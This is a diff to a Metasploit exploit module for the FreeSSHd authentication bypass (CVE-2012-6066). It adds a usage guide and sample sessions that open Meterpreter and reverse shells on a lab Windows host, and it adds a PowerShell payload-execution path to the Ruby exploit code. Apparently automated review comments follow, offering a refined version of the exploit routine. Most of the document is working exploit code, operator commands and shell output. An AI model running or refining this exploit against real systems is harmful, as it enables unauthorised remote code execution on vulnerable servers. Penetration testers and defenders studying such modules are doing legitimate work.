diff --git a/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md b/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md
new file mode 100644
index 0000000000..aa84d1a30d
--- /dev/null
+++ b/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md
@@ -0,0 +1,92 @@ +## Description + +This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication. + + +## Verification + + 1. Start msfconsole + 2. Do : `use exploit/windows/ssh/freesshd_authbypass` + 3. Do : `set RHOST [target IP]` + 4. Do : `set PAYLOAD [valid windows payload]` if you want to use other payloads (`windows/meterpreter/reverse_tcp` by default) + 5. Do : `set LHOST [Your IP]` + 6. Do : `set LPORT [valid port]` (port is `4444` by default) + 7. Do : `exploit` + 8. If target is vulnerable, a shell (`meterpreter` by default) should pop + +## Example with default payload (windows/meterpreter/reverse_tcp) +``` +msf > use exploit/windows/ssh/freesshd_authbypass +msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131 +RHOST => 192.168.80.131 +msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138 +LHOST => 192.168.80.138 +msf exploit(windows/ssh/freesshd_authbypass) > exploit + +[*] Started reverse TCP handler on 192.168.80.138:4444 +[*] 192.168.80.131:22 - Trying username '4Dgifts' +[*] 192.168.80.131:22 - Trying username 'EZsetup' +[*] 192.168.80.131:22 - Trying username 'OutOfBox' +[*] 192.168.80.131:22 - Trying username 'ROOT' +[*] Sending stage (179779 bytes) to 192.168.80.131 +[*] Meterpreter session 2 opened (192.168.80.138:4444 -> 192.168.80.131:49166) at 2018-11-16 16:10:33 +0800 + +meterpreter > sysinfo +Computer : SSH-TEST-SERVER +OS : Windows 8.1 (Build 9600). 
+Architecture : x86 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x86/windows +meterpreter > + +``` + +## Example with plain old reverse shell (windows/shell_reverse_tcp) +``` +msf > use exploit/windows/ssh/freesshd_authbypass +msf exploit(windows/ssh/freesshd_authbypass) > set RHOST 192.168.80.131 +RHOST => 192.168.80.131 +msf exploit(windows/ssh/freesshd_authbypass) > set PAYLOAD windows/shell_reverse_tcp +PAYLOAD => windows/shell_reverse_tcp +msf exploit(windows/ssh/freesshd_authbypass) > set LHOST 192.168.80.138 +LHOST => 192.168.80.138 +msf exploit(windows/ssh/freesshd_authbypass) > set LPORT 4444 +LPORT => 4444 +msf exploit(windows/ssh/freesshd_authbypass) > exploit + +[*] Started reverse TCP handler on 192.168.80.138:4444 +[*] 192.168.80.131:22 - Trying username '4Dgifts' +[*] 192.168.80.131:22 - Trying username 'EZsetup' +[*] 192.168.80.131:22 - Trying username 'OutOfBox' +[*] 192.168.80.131:22 - Trying username 'ROOT' +[*] Command shell session 1 opened (192.168.80.138:4444 -> 192.168.80.131:49167) at 2018-11-16 16:12:19 +0800 + + + +C:\Windows\system32>ipconfig +ipconfig + +Windows IP Configuration + + +Ethernet adapter Ethernet0: + + Connection-specific DNS Suffix . : localdomain + Link-local IPv6 Address . . . . . : fe80::5d22:f345:9ea1:a320%3 + IPv4 Address. . . . . . . . . . . : 192.168.80.131 + Subnet Mask . . . . . . . . . . . : 255.255.255.0 + Default Gateway . . . . . . . . . : + +Tunnel adapter isatap.localdomain: + + Media State . . . . . . . . . . . : Media disconnected + Connection-specific DNS Suffix . : localdomain + +C:\Windows\system32>hostname +hostname +SSH-TEST-SERVER + +C:\Windows\system32> +```
diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb
index 5062cf0103..98420d2405 100644
--- a/modules/exploits/windows/ssh/freesshd_authbypass.rb
+++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb
@@ -3,10 +3,13 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+require 'msf/core/exploit/powershell'
+
 class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Powershell
 include Msf::Exploit::CmdStager
 def initialize(info = {})
@@ -15,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
 info,
 'Name' => "Freesshd Authentication Bypass",
 'Description' => %q{
- This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
+ This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
 authentication. You just need the username (which defaults to root). The
 exploit has been tested with both password and public key authentication.
 },
@@ -24,24 +27,26 @@ class MetasploitModule < Msf::Exploit::Remote
 [
 'Aris', # Vulnerability discovery and Exploit
 'kcope', # 2012 Exploit
- 'Daniele Martini ' # Metasploit module
+ 'Daniele Martini ', # Metasploit module
+ 'Imran E. Dawoodjee (minor improvements)' # minor improvements
 ],
 'References' =>
 [
- [ 'CVE', '2012-6066' ],
- [ 'OSVDB', '88006' ],
- [ 'BID', '56785' ],
- [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
- [ 'URL', 'https://seclists.org/fulldisclosure/2010/Aug/132' ]
+ ['CVE', '2012-6066'],
+ ['OSVDB', '88006'],
+ ['BID', '56785'],
+ ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
+ ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
 ],
 'Platform' => 'win',
 'Privileged' => true,
- 'DisclosureDate' => "Aug 11 2010",
- 'Targets' =>
+ 'Targets' =>
 [
- [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
+ ['PowerShell', {}],
+ ['CmdStager upload', {}]
 ],
- 'DefaultTarget' => 0
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => "Aug 11 2010"
 )
 )
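Review bot: The explicit `require 'msf/core/exploit/powershell'` added at the top of the file is most likely redundant: the neighbouring mixins `Msf::Exploit::Remote::Tcp` and `Msf::Exploit::CmdStager` are brought in by their `include` lines alone, which suggests the framework resolves these constants without a hard-coded library path, and pinning `msf/core/...` ties the module to the current directory layout. Unless this module has to load in a context where that resolution is unavailable (worth confirming against other modules that include the PowerShell mixin), dropping the two added lines and keeping only `include Msf::Exploit::Powershell` matches how the rest of the file pulls in its mixins.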
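Review bot: The new author entry in the third hunk, `'Imran E. Dawoodjee (minor improvements)' # minor improvements`, states the contribution twice; the surrounding entries keep the name bare and put the role in the trailing comment, so `'Imran E. Dawoodjee' # minor improvements` follows the existing convention. The `exploit` method in the last hunk of this file dispatches on the literal target names `'PowerShell'` and `'CmdStager upload'` introduced here, so a later edit to either string in `'Targets'` silently disables that branch; a short comment next to the targets such as `# names are matched by target.name in #exploit` would make the coupling visible.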
@@ -68,7 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
 disconnect
 if banner.match?(/SSH\-2\.0\-WeOnlyDo/)
 version = banner.split(" ")[1]
- return Exploit::CheckCode::Appears if version.match?(/(2\.1\.3|2\.0\.6)/)
+ return Exploit::CheckCode::Vulnerable if version.match?(/(2\.1\.3|2\.0\.6)/)
+ return Exploit::CheckCode::Detected
 end
 Exploit::CheckCode::Safe
@@ -80,13 +86,13 @@ class MetasploitModule < Msf::Exploit::Remote
 def setup_ssh_options
 {
- :password => rand_text_alpha(8),
- :port => datastore['RPORT'],
- :timeout => 1,
- :proxies => datastore['Proxies'],
- :key_data => OpenSSL::PKey::RSA.new(2048).to_pem,
- :auth_methods => ['publickey'],
- :verify_host_key => :never
+ password: rand_text_alpha(8),
+ port: datastore['RPORT'],
+ timeout: 1,
+ proxies: datastore['Proxies'],
+ key_data: OpenSSL::PKey::RSA.new(2048).to_pem,
+ auth_methods: ['publickey'],
+ verify_host_key: :never
 }
 end
@@ -133,19 +139,31 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 def exploit
+ unless [CheckCode::Vulnerable].include? check
+ fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+ end
+
 options = setup_ssh_options
 @connection = nil
 each_user do |username|
 next if username.empty?
+
 @connection = do_login(username, options)
 break if @connection
 end
 if @connection
- print_status("Uploading payload, this may take several minutes...")
- execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
+ case target.name
+ when 'PowerShell'
+ print_status('Executing payload via Powershell...')
+ psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+ @connection.exec!("cmd.exe /c " + psh_command)
+ when 'CmdStager upload'
+ print_status("Uploading payload, this may take several minutes...")
+ execute_cmdstager(flavor: :vbs, decoder: default_decoder(:vbs), linemax: 1700)
+ end
 end
 end
 end
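Review bot: The banner-based version match in `check` is upgraded from `CheckCode::Appears` to `CheckCode::Vulnerable`, yet nothing in this hunk confirms the bypass; the framework convention reserves `Vulnerable` for a check that has actually verified the flaw and `Appears` for a version-string match, which is exactly what `version.match?(/(2\.1\.3|2\.0\.6)/)` is. Keeping `return Exploit::CheckCode::Appears if version.match?(/(2\.1\.3|2\.0\.6)/)` and widening the new gate in `exploit` (the last hunk of this file) to `unless [CheckCode::Vulnerable, CheckCode::Appears].include?(check)` preserves the fail-fast behaviour the commit introduces without over-claiming in `check` output. The added `return Exploit::CheckCode::Detected` fallback for a WeOnlyDo banner with an unlisted version is a sensible addition. The `check` method begins before this hunk.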
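Review bot: In the new `'PowerShell'` branch of `exploit` the value returned by `@connection.exec!` is discarded, so a command that fails on the remote side leaves the operator with no indication of what happened; the `exec!` helper appears to hand back the command output, so capturing it and printing it under verbose mode gives something to diagnose, and interpolation replaces the `"cmd.exe /c " + psh_command` concatenation. The `case target.name` also has no `else`, so a target renamed in `initialize` silently does nothing, and the pre-existing `if @connection` falls through without a message when no username is accepted; since this hunk now uses `fail_with` for the not-vulnerable case, explicit `fail_with` branches for both would be consistent. The `exploit` method as shown ends within the hunk, but the `each_user`/`do_login` helpers it relies on are outside it.
```ruby
    if @connection
      case target.name
      when 'PowerShell'
        print_status('Executing payload via Powershell...')
        psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
        result = @connection.exec!("cmd.exe /c #{psh_command}")
        vprint_status(result) if result && !result.empty?
      when 'CmdStager upload'
        # … unchanged: cmdstager upload …
      else
        fail_with Failure::BadConfig, "Unknown target: #{target.name}"
      end
    else
      fail_with Failure::NoAccess, 'No username was accepted by the target'
    end
```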